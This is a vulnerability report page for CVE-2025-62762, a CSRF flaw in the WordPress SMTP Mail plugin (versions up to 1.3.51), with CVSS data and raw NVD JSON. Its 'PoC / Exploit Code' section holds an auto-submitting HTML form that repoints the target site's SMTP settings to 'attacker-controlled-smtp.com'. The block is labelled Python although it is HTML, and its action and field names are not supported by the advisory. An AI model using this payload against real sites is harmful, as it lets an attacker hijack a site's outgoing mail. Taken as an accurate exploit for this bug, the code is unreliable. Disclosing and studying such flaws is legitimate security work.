Security Vulnerability Report
中文
CVE-2025-62762 CVSS 4.3 MEDIUM

CVE-2025-62762

Published: 2025-12-09 16:18:03
Last Modified: 2026-04-23 15:34:42

Description

Cross-Site Request Forgery (CSRF) vulnerability in photoboxone SMTP Mail smtp-mail allows Cross Site Request Forgery.This issue affects SMTP Mail: from n/a through <= 1.3.51.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

photoboxone SMTP Mail <= 1.3.51

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-62762 --> <!-- Target: WordPress SMTP Mail Plugin <= 1.3.51 --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC</title> </head> <body> <h1>CSRF PoC - SMTP Configuration Change</h1> <p>Submit this form to modify SMTP settings:</p> <form action="http://target-wordpress-site/wp-admin/admin-post.php" method="POST" id="csrf-form"> <!-- WordPress nonce bypass - relies on missing nonce validation --> <input type="hidden" name="action" value="save_smtp_settings"> <input type="hidden" name="smtp_host" value="attacker-controlled-smtp.com"> <input type="hidden" name="smtp_port" value="587"> <input type="hidden" name="smtp_username" value="[email protected]"> <input type="hidden" name="smtp_password" value="stolen_password"> <input type="hidden" name="smtp_from" value="[email protected]"> </form> <script> // Auto-submit form on page load document.getElementById('csrf-form').submit(); </script> <p>If you see this text, the form has been submitted.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62762", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:03.027", "lastModified": "2026-04-23T15:34:41.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in photoboxone SMTP Mail smtp-mail allows Cross Site Request Forgery.This issue affects SMTP Mail: from n/a through <= 1.3.51."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/smtp-mail/vulnerability/wordpress-smtp-mail-plugin-1-3-47-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}